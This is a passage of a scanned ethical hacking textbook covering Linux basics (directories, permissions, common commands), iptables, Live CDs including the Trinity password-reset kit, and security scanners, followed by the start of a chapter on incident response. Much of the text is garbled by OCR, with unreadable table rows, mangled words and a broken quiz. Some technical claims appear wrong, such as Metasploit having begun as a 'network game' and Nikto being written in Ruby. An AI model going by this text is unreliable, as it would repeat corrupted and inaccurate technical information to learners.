advanced operations, it is not your only option. In fact, Linux has had to introduce more advanced and usable interfaces as it has become more popular and widely adopted. Basic Linux Navigation One of the biggest differences you will notice in the Linux operating system if you are transferring in from Windows is how drives are referenced. In Linux, unlike Windows, drive letters are not used. Instead, drives and partitions are referenced by a using a series of lileuames in the format: /dev/hdal/file There are plenty of people who still believe that the only way to use Linux is to roll up your sleeves and get intimately familiar with the command line, but this is not the case. Many tools that you will use as a security professional now have GUIs that make them much easier to use. Of course, don’t let this become a crutch, because a good understanding and comfort level with the command line is essential for you to be successful with Linux. CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools 303 table 13-1 Linux directories and purposes. DIRECTORY PURPOSE i n is represents in e root ot ine rue system, i n is is similar in some respects to the location C:\ in Windows. /bin All executaDies in tn is o irectory are- accessmie any usaoie oy an system users. This can be considered to be more or less Jike the Windows folder in the Windows operating system. /boot Lon tains an tne tnes tnat are re qui red to sta rt up ana ooot a Lin ux ope rat i n g system. /dev Location where the files that dictate the access between hardware and the operating system resioe- inese can oe tnougnt ot as □ rivers a no similarly reSated files. E- e 1 ar + ^”1″ ~ fc i~ i — l +n c~ ^ r 1 — l ro j — n”f” i n i i r if i <r~»i f-^ n rfc-f rm — \ \ t f-\ f-h 4- j-^ r ~ ^ ■ — s w-ii if — b + 1 j-h n e ^ r~a 1 ^~ti~ — i ^ q j^J r 1 1 tf s l r i d i d r e lu s l cj i e iu niiyurdiiuri 1 1 1 1 u r i r id 1 1 u n i u r d jj p i iLd l i u r i s d r e i ucd Leu in this folder. Applications can also store some configuration information in their own directories. /nome I nis location is wnere tne users win store tneir inTormation Dy oetauit, lypicany their information is stored in per-user subdirectories underneath this folder. /lib Library files (mostly C programming language object files) can be found here. Libraries are shared code that is incorporated into an application later on demand. Mppticanons ano tne ui store tneir iiorary nies in mis location oy ueTauix. /mnt Certain nonpermanent file systems (floppies, CD-ROMs, nfs) are normally placed nere wnen a aevice is activateo. txampie. vvnen you place a lu into tne CD-ROM drive, the OS may mount (connect to) the CD file system and display the directories and files under /mnt/cdrom. /opt This directory is used at the administrator’s discretion (optional) but it is typically used for third-party software. /proc This directory contains vital information about running processes on the Linux system, /root The home directory of the root user is contained \r> this special directory away from normal users. /sbin The system binaries directory contains executables that are used by the OS and the administrator not typically by normal users. /tmp A temporary directory for general use by any user. /usr Generic directory that contains the body of useful folders and files for use by Linux users such as executables and documentation. A/ar Important directory that contains system variables such as print and mail spoolers, log filesj and process IDs. 304 PART 2 A Technical Overview of Hacking .Another difference that exists between Windows Bind Linux is how directories tire annotated. Tn Windows, directories are referenced with the Lam i Liar ” V. L>ut in Linux the directories are V” If anything is going to cause you grief as a Windows user moving to Linux* this is probably it. Important Linux Directories When navigating the many different directories in the Linux file system, you will need to have a good knowledge of the different directories and what they provide to the user. Table 15-1 lists some of the vital directories in the Linux file system. Awareness of these built-in directories allows administrators to monitor known expected files and directories and detect rogue files that have been either accidentally placed in sensitive directories or maliciously planted to trap unsuspecting system users. Users, Groups, and Special Accounts Linux is an operating system that is designed around a multiuser modeL This design gives Linux the ability to have more than one user logged in and actively using the system at any particular time. This makes it necessary for each user to have an individual user account and home directory to store information. Linux also allows for different user accounts to be assigned different privileges for different access Levels. All Linux users on a particular system have an associated user TD. belong to a group, and have a unique identification number referred to as a IJID (user ID). Working with user accounts are groups that are used to assign privileges collec- tively to multipte users. For example, grouping users into units that reflect job functions or desired access such as accounting, sales, or development wouJd allow for quick and easy assignment of privileges. With a group you can place users with the same desired level of access in a group and give that group access instead. Groups are generally a way to put users together in a logical organization that is used to assign common access privileges and to simplify administration In Linux, systems users gain Eiccess to a system only after a special ac count known as the root user, or super user, has created user accounts and given these user accounts access. The root user is a very special and unique account because it is the account that has complete and unrestricted access to all com m ands, files, and other system components. The su peruser or root account is created on all Linux systems when the operating system is installed. The root account is the account that must be used to create user accounts, create groups, assign permissions, and perform other sensitive system actions. Only the root user can add new groups and users. The new accounts define the user’s environment and level of access. New users may be created by doing the following: CHAPTER 13 Linux, Liv& CDs, and Automated Assessment Tools 305 m h The root or su peruser account should be used only by those who are more experienced with the system and understand the consequences of using the account. Unlike with the Windows operating system, in which it is not unheard of for users to log in as an administrator to perform tasks, in Linux users are discouraged from using the root account directly. It is normally accessed only from another account for selected actions. In some versions of the Linux operating system, such as Ubuntu, the root account is disabled and cannot be logged into directly. This requires the user to run commands from another account and selectively grant root access as needed. • Adding entries in the /clc/passwd iile for the user • Creating a home directory for the user name (/home/<user_name> • Assigning a default login shell • Working with Permissions I ■ very tile and folder that resides on the hard drive of a Linux system has an associated set of permissions. These permissions dictate how a particular item may be interacted with and by whom. Specifically, in Linux access is granted to three types of users that dictate the level of access that will be permitted, The following are the types of users associated with every file: • Owner — Owner (U) of a file is the individual or user account who generated the file. • File group — Croup {G \ is the group the owner was logged in under while creating the file: all users that belong to the file’s group have a common level of access • to the file. • Others group — Others (0) group refers to all users on the system other than the owner and the file’s group mem hers. Files and directories also have three types of permissions associated with them: • Read permission al!ow r s users to view a file, but not change or alter the file in any way. Read permissions to a directory allow users to view the directory’s contents, but do not permit changes to the directory contents. • Write permission allows users to modify and save files, and add or delete files in directories. • Execute permission allows users to execute a file such as with a command, • [f applied to a directory, the permission will allow access to files within the directory, ra 306 PART 2 A Technical Overview of Hacking table 13-2 Representation of letters for Linux. d r w Owner Item Read Write type x r w Group Execute Read Write x r Other Execute Read Write Execute In order to view the permissions assigned to each type of user for all the iiies located in a directory, issue the long listing option ( – 1) of the Is command: [ Link ] ~S Is -1 total IS drHxr-xr-xf 2 Link None 0 Nov 26 18:11 Java rw-r — r– 1 Link None 57 Nov 24 21:21 errors – rw – r – – r – 1 Link None 55 Nov 24 21:25 eriors.txt rrt-r–r- – 1 Link None 8728 Nov 24 20:19 lsinfo.txt rwxr-xr-x 1 Link None 43 Nov 26 01:42 myStript [ LinuxUser ] -$

The preceding string of letters for each entry represents the permissions that
correspond to each user or group.:

drHxr-xr-x

NOTE

In some cases, a hyphen
may appear in any of the
permission fields and in this
case the system is stating that
the user has no permissions
of that type.

Table 13-2 illustrates what each letter represents left
to right. Reading the permissions left to right indicates
the following”

• The type of file (or in d for directory)
• The next three represent the user’s permissions

• ■ The next three positions indicate the group permissions

• The last three represent the access provided
to everyone else.

Another example is:
drwxr-xr-x-

This folder allows read, write, and execute permissions for the owner, but only read
and execute for the group and for other users.

CHAPTER 13 Linux, Liv& CDs, and Automated Assessment Tools

Commonly Used Commands

Because of the many tasks that can be performed within a command line or terminal
window, it is vital for you to understand terminal windows and the frequently used
commands* This will require using the knowledge that you acquired earlier of filenames,
directory names, and commands that Eire case sensitive. When at the Linux command
line, you will see a command prompt similar to what is shown here:

[ root@impa /]#.

This command prompt indicates the user account logged in (in this case, root), the
computer name (in this case, impa), along with the current directory (in this case, /},
The # symbol at the prompt indicates that the user account holds privileges, whereas
a prompt that is followed by the I will indicate a user account with standard privileges,

Basic Command Structure

Linux commands share a common form, which is the following:

command <option(s)xaigument(s)>
The command identifies the command you want Linux to execute.

■ The name of a command generally consists of lowercase letters and digits,

• Options modify the way a command works. For example, the – a option
of the Is command generates the output of the command to list ‘”hidden” files
as well as normal files.

root@l inuxhost : /#ls -a

is the same as

root^impa : /#ls -al

FY I

The majority of Linux commands are case sensitive and you should pay very close attention
to this fact. /’■■ : ammand that is entered in uppercase versus lowercase versus mixed case
ib not the same command. For example, look at the Is command:

• Ls
• LS

• Is

• Each of these is considered a different command by the operating system and each will
be interpreted differently.

This behavior is different from Windows, where case doesn’t matter the majority of the time.

308 PART 2 A Technical Overview of Hacking

TABLE 13-3

Linux commands.

COMMAND

PURPOSE

Ls

The list command is similar to the dir command in Windows, with very similar
options, The Is command is used to display all the files and subdirectories
in a given location.

pwd

The pri nt working directory command is similar to the cd command in Windows,
It is used to display the current location the user is in within the Linux directory
structure. This command is very useful especially for the newbies that can get
lost in the Linux file system quite quickly.

pwd

Cd

The change directory command is used to switch between locations in Linux,
This command is identical in operation to the Windows version. The main
difference is the way directories are referenced (remember your slashes).

Important shorthand notations include these:

root of file system: /
current directory: ./

parent directory (the preceding directory): . . /
home directory: «■
cd <path>

mkdir

Make directory is a command used to create new directories in Linux.
The format is as follows;

mkdir <new directory name>

rmdir

Remove directory is a command that is used to remove or delete empty
directories from the Linux fife system. This is the key point, empty; the directory
must be empty or the command will faiL

rmdir directory name>

rm

A more aggressive removal command that removes files or folders. The different
between this command and the rmdir command with respect to directories is
that this command will remove a directory that is not empty. When using this
command on directories, exercise caution,
rm <filename>

cp

A command that is used to copy files from location to location much like the
copy commands in other operating systems.

cp <or iginat locations <new location>

mv

The mv command is used to move files from one location to a new location,
mv <original location> <new location>

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

309

The next detail in commands is the arguments that are used to
specify filenames or other targets, that fine-tune or tweak the action
of the command. For example, the Is command lets you specify a
directory as an argument, which causes the command to list files
in that particular directory:

Some commands provide the
ability to specify a series of

arguments; in these situations
you must separate each

root@impa :/#ls /bin

argument with a space or tab.

Table 13-3 lists a small number of the commands In Linux,
but you should become comfortable with all of them, including
their functions.

Ipchains and Iptables

The Linux operating system offers several tools for controlling traffic to and from a system,
including ipchains and iptables.

Ipchains is an early firewall technology for Linux that controls traffic by checking packets.
Packets encountering the ipchains technology will enter n set of rules known as a chain.
The packet is checked against these rules to see if it matches any known bermviors that
would be considered malicious or incorrect. Traffic that is analyzed and shown to be

u

suspicious will be dealt with accordingly, and traffic t Jt ti t is permitted will be sent on to the
system to make whcit is known as a routing decision. The decision that is made will be based
on whether the destination for the packet is Eitt ached to the device or is remote. A local
device will be sent to the appropriate interface on the device; in iJu? event the destination
is remote, it will be forwarded to a forward chain before being sent onto an output chain
and on toward its destination.

So what are chains? Ipchains are m ride up of rules< and each rule is composed of a
set of definitions that specifies which packets must match it and what to do if the packet
matches the rule. Every packet that arrives or departs a computer will be processed by
at least one chain, and each rule on the chain will be compared with the packet. If one
malt – lies the packcl . the pruivr»s sicips. and I he rule is read to deLerir.mu vvhui io do with
the packet When a packet traverses a whole chain and no match is found, a policy defined
for the chain is followed that dictates what to do with the packet.

One of the problems with ipchains is simplicity; the process described here is complex
and time-consuming to perform on eEich packet, In response to this, a new packet-filtering
framework known as netfiller was designed with the goal of simplifying and improving
the process of packet filtering. Net filter introduced cleaner packet filtering as well as
improved flexibility compared with ipchains.

pchains

310 PART 2 A Technical Overview of Hacking

rt FYI

Iptables is a utility used to set up, maintain, and inspect the packet-filtering rules in Linux. Iptables
handles packets in two ways: chains and tables. A chain is a set of rules that tells iptables how
to manipulate a packet that matches a given rule. Even with no user-defined iptables statements
on your router, each packet passing through the router will flow through at least one oi the three
predefined chains in the operating system:

IPtables

Iptables is the successor to ip chains and introduces a more efficient method of processing
packets than ipchains offers, Iptables builds on the technology introduced in netfilter and
uses some of the modules of the software to make a more robust technology. Iptables and
ipchains both process packets, but iptables goes one step further than ipchains. Although
ipchains uses rules arranged in a list or chain, iptables builds on this by adding tables
to the mix. Iptables uses these tables to decide how to handle a packet whether it is to
network address translation (NAT) or perform some other type of filtering on the data.
As opposed to chains, this table format allows for a much greater degree of flexibility than
Ipchains because the ability to filter packets is more dynamic. Furthermore, the changes
introduced in iptables means that a packet will pass through only one tillering point
during its process, as opposed to ipchains, in which a packet can pass through multiple
points on its journey across the network.

Live CDs

Something that is available in Linux timl is somewhat unusual is a Live CD, Live CDs
are pieces of media that contain a complete and bootable operating system. This is
very different from the w T ay items such as boot floppies were in the past. In the case
of boot floppies, a completely functional operating system was just not possible —

t- j fyi )

Don’t let the term Live CD fool you; you can run these live distributions oft of any type of media
including CDs, DVDs r portable hard drives, and USB flash drives. In fact r an increasing number
of Linux users are installing live distributions on high-capacity flash drives in which they can store
the entire operating system, all applications, and their data. When installed on a flash drive in
this manner, you can literally carry your entire desktop from system to system and have the same
experience no matter where you go.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

except in the early days of Direct Operating System (DOS). With Live CD, you can run an
operating system that is fully featured and functional, and gives the same experience as
the operating system when it is installed on the hard drive of a computer. For all intents,
and purposes, in this course you can say that just Eibout every distribution of Linux is
available in a Live format, with few exceptions.

One of the bigger benefits of a Live CD is that you can boot a computer off a Live CD
and not make any alterations to the existing operating system on the computer’s hard
drive. When running a Live CD, the computer boots off the given media and uses the
operating system that is running totally off the removable media. This can be useful for
evaluating the operating system prior to making changes to the computer in any way.
You could also use this for evaluating hardware support and compatibility. You can also
use a Live CD to trouhleshoot hardware (for example, when a piece of hardware fails or
to recover a corrupted operating system).

Other common uses of live distributions include:

• Installing Linux on a new system
■ Testing new software
• Evaluating different hardware configurations

• Re pa iri n g d a m aged s y stem s

• Guest systems

• Portable systems

• Pentesting

• Multiboot

• Forensics

• Providing a secure n on- alterable operating system

• Kiosks

• Persistent desktops

• As with most live distributions, the ability to return the system to whatever state it
happened to be in prior to the installation is standard. The process is simple: Boot off the
live media and use the operating system; when you are done, shut down the operating
system, eject the media, reboot, and you are back where you started. The downside of
live distributions is performance; because the entire operating system is being run from
physical memory, the performance will be less than if it were in si a lied on the physical
hard drive. Essentially the entire operating system is running from random access
memory (RAM ) along with all the applications, which means less RAM to go around.
However, the amount {if RAM required for Linux is quite low, with some Linux distribu-
tions being able to run in memory as little as 32 Mil.

312 PA RT 2 A Tech nical Overview of H ack i ng

• i ™ )

When evaluating Linux as a live distribution, always factor in this performance penalty.
Live distributions run everything from physical memory, and anything that is not in memory
will have to be retrieved from the physical media {such as the CD). Because media such as
CDs and DVDs will be slower than a hard drive, you will notice a lag for features you have
not accessed previously {this lag will be less on flash drives).

I

While the majority of Live CDs are designed for you to test drive an operating system,
there are CDs designed for other uses. Live CDs are available that are used for forensic
purposes, malware removal, system recovery, password reset, and other uses.

Although the majority of Live CDs can run in memory to free the optical drive or other
media for other uses, loading the data off of a CD-ROM will always he slower than a hard
drive-based installation. With larger operating systems there will he a substantial penalty
incurred while the required information is loaded off the media, but with smaller images
image into physical memory provides substantial performance benefits because RAM
is much faster than a hard drive.

Special Purpose Live CDs

Live CDs can be generic or very specific and purpose-built
Purpose-built CDs are different from other, more commonly found
live distributions in that someone built them with a very unique
purpose or need in mind. In the case of regular Live CDs. the live
distribution provides all the information needed to run a regular
operating system and even provides the ability to install the OS.
In the case of purpose-built CDs this may not be true: in fact, some
of the Linux distributions (distros) may not even have the ability
to install

Some examples of purpose-built distributions include:

• Firewalls

• Rescue disks

■ Password reset (such as Trinity)

Trinity

The Trinity Rescue Kit (TRK) is a Linux distribution that is specifically designed to be run
from a CD or flash drive. The TRK was designed to recover and repair both Windows and
Linux systems that were otherwise unbootable or unrecoverable. While the TRK was
designed for benevolent purposes, it can easily be used to escalate privileges by resetting

NOTE

Typically, purpose-built
distributions of this type
Include firewall applications,
rescue disks, security tools,
multimedia versions, and
others. In somecases 4 these
distributions wfl I not even
have an option to install to
the hard drive — allowing
the OS only to run from the
media.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

313

Trinity can be used to change a password by booting
the target system off of a CD or flash drive and entering
theTRK environment. Once in the environment, a simple
sequence of commands CEin be executed to reset the password
of an account.

Caine

Computer Aided INvestigative Environment (CAINE) is based on
the popular Ubuntu Linux live distribution and was created by
Digital Forensics for Interdepartmental Centre. The distribution
contains a collection of tools wrapped up into a user-friendly
environment. It has features that allow for the collection and
analysis of evidence tor investigative purposes. The distribution
rich forensic functions.

NOTE

Trinity can be used as a follow-
on toot to the enumeration
techniques discussed earlier
Trinity works best when you
know the name of the account
to be changed. The enumeration
techniques shown previously
allow you to browse the
accounts on a system and select
a target account.

Astaro

Astaro is an integrated all-in-one iirewall: a full hardened OS designed to host
a iirewall and perform all the functions of such an application such as stateful
packet inspection, content filtering, application proxies, and IP Sec- based virtual
private networks (VPNs). It is intended to enforce network security without
sacrificing performance, allowing branch offices, customers, and suppliers to

Damn Vulnerable Linux

Damn Vulnerable Linux (DVL) is a version of Linux that is based on the popular
Slackware and Slax-based live DVD. The distribution is designed to be purposefully
filled with broken, ill-configured, outdated* and exploitable software. It is intended as
a training aid or research tool that demonstrates various security concepts such as
reverse code engineering, buffer overflows, shell code development, Web exploitation,
and SOL injection.

Network Security Toolkit (NST)

Network Security Toolkit (KST) is a distribution based on the l 7 edora Core OS,
which was engineered to provide quick access to several open source network security
applications, and runs on x86 platforms. The goal of developing this distribution
is to provide a comprehensive set of open source network security tools. This distri-
bution can be used to transform an x8f> systems (Pentium II and above) into a system
designed for network traffic analysis, intrusion detection, network packet generation,
wireless network monitoring, a virtual system service server, or a sophisticated
network/host scanner.

314 PART 2 A Technical Overview of Hacking

Automated Assessment Tools

There are many tools available for performing network testing in the Linux wo rid:
so many, in fact, that there is no way to mention every tool and package. In this section,
you will be introduced to some of the more widely used tools for performing security
lesling that are based on the Linux platform.

As a security professional you will quickly learn that you cannot perform every
security test manually. In fact, many of the tests that you will be required to perform
are best left to automated tools. With the rapid evolution and deployment of threats and
the vulnerabilities associated with them, automated tools allow for the quick discovery
and subsequent process of addressing these problems.

As a security professional, you will most likely use a broad and diverse combination
of automated and manual assessment tools. Use an automated assessment tool and then
follow up with manual tools and analysis where appropriate. What an assessment tool
looks for depends on the tool in use, but it can be anything from applications, individual
systems, or an entire network:

• S ource code scan ner s i n clud e those sc an n er s spec i fi c ally d esign ed to exam i n e
the source code of an application.
• Application scanners are those that are designed to analyze the weaknesses
in a specific application or type of application.

• System scanners analyze systems and /or networks for a wide range of configuration
or other types of application-level problems.

• Source Code Scanners

Source code scanners are employed by those who need to locate security problems that
exist in the source code of applications. Scanners in this category have the ability to detect
software problems that include buffer overflows, privilege escalations, and other software
errors and defects:

■ Buffer overflows that would enable data to be written over portions of or alter
an executable, which would enable tin attacker to perform any number of acts

• Race conditions that would cause a system to function incorrectly and even
deny Eiccess to resources to those authorized to use them
• Privilege escalation such as when a piece of code executes with higher
privileges than should be allowed by the user who Initiated the execution

• Lip ui validation errors when data is either wholly or partially unchecked
as it passes through the applications potentially causing errors

Some tools used to find these types of problems include;

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

315

• Flawfinder — An application written in the Python programming language.
This program can search through the source code of an application looking for
security flaws. Generates a report with flaws organized by priorily or seriousness.
• Rough Auditing Tool for Security (RATS) — Authored in C. this program contains
the ability to process rules for analyzing source code; these rules are written in XML.

• StackGuard — A special compiler that is designed to build applications that are
hardened against specific types of attacks. Programs run through this compiler
tend to be largely or completely immune to spec i lie types of attacks afterward,

• ■ Unsafe — GenerEites a protection method that has the trait of not requiring
applications to be recompiled. It guards against buffer overflows and can protect
applications for which the source code isn’t available.

■ Metasploit — This application is authored in the Ruby development language, and
was created in 2(103 as a portEible network game using the Perl scripting language.
This application is known for uncovering some of the most sophisticated exploits
lei public securiu VLiluuraoilUies, Tiiis L:>uJ i> also useful to security researchers
for its ability to analyze, security vulnerabilities.

Application Level Scanners

Application vulnerability scanners are used to analyze applications that hai r e been
compiled rather than the application’s source code it sell. Tools in ibis CEitegory look for
potential vulnerabilities that can be uncovered as the application is executing. Scanners
of this type can look at every aspect of a n application including the compiled components g
and configuration. Some examples of application-level scanners are:

Whisker One — An application scanner designed to analyze Web applications.
Specifically, this scanner is designed to look for errors in the Web server-side scripting
language known as Common Gateway Interface (CGI), Under the right conditions,
CGI is a powerful and effective scripting language. Under less than ideal conditions,
this language can lead to information leakage that can allow an attacker to observe
con ft dent ia I information and run unauthorized commands.

• N-stealfh — This application scanner has the ability to analyze thousands of security
faults in applications and provide results in a formatted structure.

Weblnspect — A Web application vulnerability scanning tool. Can scan for more
than 1.500 known Webserver and application vulnerabilities and perform smart

■ Nikto Simple — A Web vulnerability program that is fast and thorough, written
in Ruby. It even supports basic port scanning to determine whether a Web server
is running on any open ports.

• App Detective — This application-level scanner performs penetration and audit tests.
It doesn’t need any special permissions; the test queries the server and attempts to
glean information Eibout the database it is running, such as its version.

316

PART 2 A Technical Overview of Hacking

System- Level Scanners

These types of scanners can probe entire systems and associated services and components.
A system -level scanner can be run against a single address or a range of addresses and
can also test the effectiveness of layered security measures, such as a system running
behind a firewall.

System-level scanners are not perfect. They have the ability to audit the source of the
processes that are enabling services, and they use the resulting responses of a service to
q iinile number of probes, meaning that all possible inputs cannot be reasonably tested.
System-level scanners have also been known to crash systems in some cases, which
could impact system availability.

Some of the more popular system level si’n oners include:

» N essus — The we ll-kn ow n com pre h ens ive, cro ss-pl a I fo rm . ope n so u rce vuln era b ility
scanner with command line interface (CLI) and GUI interfaces. Nessus Is a security
scanning and auditing tool that scans the ports and services a system exposes
looking for vulnerabilities.

• Nmap — A security scanner used to discover hosts and services on a computer
network that generates a virtual map of the network that has been targeted.
Can reveal the ports that are open on a single or range of systems and report
on each.
• SAINT — A well-known commercial scanner that provides vulnerEibility scanning
and identification. It has the ability to scan for vulnerabilities on the Common
Vulnerabilities and Exposures (CVE) list andean prioritize and rank these
vulnerabilities from most to least critical.

• SARA — A system- 1 eve I scanner that is command line-based and has a Web -based
(][‘!. In sunk! of Itn L-nlinii a new inodii le for every conceivable action much Like
Kessus, SARA has the ability to work with other well-known open source products
to get a more comprehensive scan.

• LAN guard — A scanner that reports information, such as the service pack level
of each machine, missing security patches, open shares* open ports, key registry
entries, weak passwords, users and groups, and more.

• VLAD — A vulnerability scanner that is written in Perl. VLAD is designed to
identify vulnerabilities in the SANS Top 10 List.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

31

CHAPTER SUMMARY

In your career as a security professional it is highly likely that you will encounter
operating systems other than the familiar Windows desktop. One of them is Linux.
While Windows still can Jay claim to the majority of desktops in the world, you still
need some familiarity with other operating systems to be complete as a security
professional.

As a security professional, it is important for you to always have an understanding
of the tools available to you, and using all the tools available to you requires some
knowledge of the Linux OS. In fact, several useful tools are available only in Linux
versions, so you have no other option but to learn Linux. The Linux OS is different from
the Windows operating system with a universe of different llles and folders that will
require some effort from you to learn. Lin ax offers a tremendous amount of benefits:
It is free and has a number of tools that will become available to you.

Additionally, Linux offers benefits that Windows just cannot offer, such as Live CDs.
Linux is one of the very few OSs that can be run off of removable media such as Hash
drives, CDs, DVDs, and portable hard drives. Linux can he hooted off removable media
without being installed on a hard drive or on a computer eliminating the need to
make changes to the computer itself.

KEY CONCEPTS AND TERMS

I p chain s
Ipttibles
Kernel

Live CD
Root user

318

PART 2 A Technical Overview of Hacking

CHAPTER 13 ASSESSMENT

1. The

is the core of the Linux operating

Z.

SYSU’IIL.

A, kernel
IL shell
C, GUI
\1 VPN

media.

runs completely from removable

A. Linux

B. Live CD
G. Kernel
D. Shell

Is a desktop in terrace Tor Linux.

A, KDti

B, CUJ1

C, Windows

D, Graphics

is a Le\3-lii!seJ i j 1 1 l-lIu vi- I’m Linux.

A. Terminal

B. KDU

C (momc
11 QUI

1. The ommand mv is used to remove empty
directories.

A. True

B. False

1. The command used to display where
you are in the file system is cd.

A, True

B. False

1. The command mv is designed to move files.

A. True
lii. I’alsr

S. The tommattd

h) remove ii tile ur icjlder,

A. xm

B. mv

C. dv
11 Is

1. The command

new directories.

A. eddir

B. mkdir

C. imdir
11 Isdir

1. “J ‘lie command

can be used

is used to create

is used to list the

files and subdirectories in a given location.

A. Is

B. dir

C. im
11 del

Incident Response and
Defensive Technologies

CHAPTER 14 Incident Response 320

CHAPTER 15 Defensive Technologies 344

Incident Response

A 5 A SECURITY PROFESSIONAL, you will be versed in a number of different
technologies and techniques, each designed to prevent an attack and secure
the organization, Each of the techniques you will learn is meant to prevent
an attack or limit its scope, but the reality is that attacks can and will happen, and
the techniques you have learned in this course cannot ever be guaranteed to stop
an attack from penetrating your organization. As a security professional, this is
a reality that you will have to accept.

Once you have accepted that an attack will inevitably penetrate your organization
at some point, your job now becomes one of how to respond to these situations:
This is the role of incident response. Incident response, as the name implies, is the
process of how you and your organization will respond to a security incident when
it occurs. Although security incidents are bound to happen, you shouldn’t sit by
and let them happen. You have to know how you will respond and the details
to this response.

Incident response is not only the act of how you respond to a security incident
but also the details involved in that response. If you respond incorrectly to an
incident you could make a bad situation worse. For example, not knowing what
to do, whom to call, or what the chain of command is in these situations would
potentially do further damage.

Finally, something that will have substantial impact on incident response s ks
potential legal aspect. When a security incident happens, it may frequently fall under
the banner of computer or related crimes, so it might require that additional care be
taken when responding. When you decide that you wish to pursue criminal charges,
you move from the realm of just responding to performing a formal investigation.
The formal investigation will include special techniques for gathering and processing
evidence for the purpose of potentially prosecuting the criminal later.

This chapter investigates and examines the various aspects of incident response
and how you can plan and design a process for responding to that breach in your
organization.

Chapter 14 Topics

This chapter covers the following topics and concepts:

• What a security incident is

• What the process of incident response is
What incident response plans (IRPs) are

• What planning for disaster and recovery is

■ What evidence handling and administration is

• What requirements of regulated industries are

Chapter 14 Goals

When you complete this chapter, you will be able to:

• List the components of incident response
List the goals of incident response

What Is a Security Incident?

A security incident in tin organization is a serious event that can occur at any point from
the desktop level to the servers and infrastructure that make the network work. A security
incident can be anything including accidental actions that result in a problem up to and
including the downright malicious. Regardless of why a security incident occurred, the
organization must respond appropriately.

A security incident can cover a lot of different events h but to clarity what constitutes
a security incident, the following guidelines tend to apply:

• The result is the theft or misuse of confidential information of any type, such as
customer in formation, patient information, or financial information.
• Tt substantially affects the network infrastructure and services, such as performance
or security.

• It provides a platform for launching attacks against a third party

• Other events can and will be included on this list, depending on the organization and the
environment in which it functions. For example, a company in the health care field would
this information, A security incident can be simply thought of as an event or situation
that adversely impacts the security stance of the organization.

322 PART 3 I Incident Response and Defensive Technologies

The concept of investigating □ crime versus investigating an incident can be confusing.
In reality, there area couple of points to consider when deciding the best course of action:

• Unless it is a serious crime with effects outside of your organization (for example, murder
or theft of credit card information), you have no legal obligation to involve the police
or press charges. Many businesses may opt not to report computer crimes because the

■ In the event of an incident in which you do want to involve law enforcement, you will
follow the rules of evidence. If you think things are moving toward this end, you should
not try to handle things internally; instead, opt to let law enforcement professionals deal
with the incident.

The Incident Response Process

Asa security professional, you are responsible for reducing ihe chance of a security
breach or incident to the lowest possible level. However, no matter how hard you try, the
reality is that you are only reducing the chance of a security incident not eliminating it,
which is nearly impossible. So as a well-prepared professional you musl plan how you will
react when a security incident occurs. This planning will reap benefits, as it will give you
the edge when determining what to do after an incident and how to do it. Proper security
incident response will determine whether an incident is dealt with sw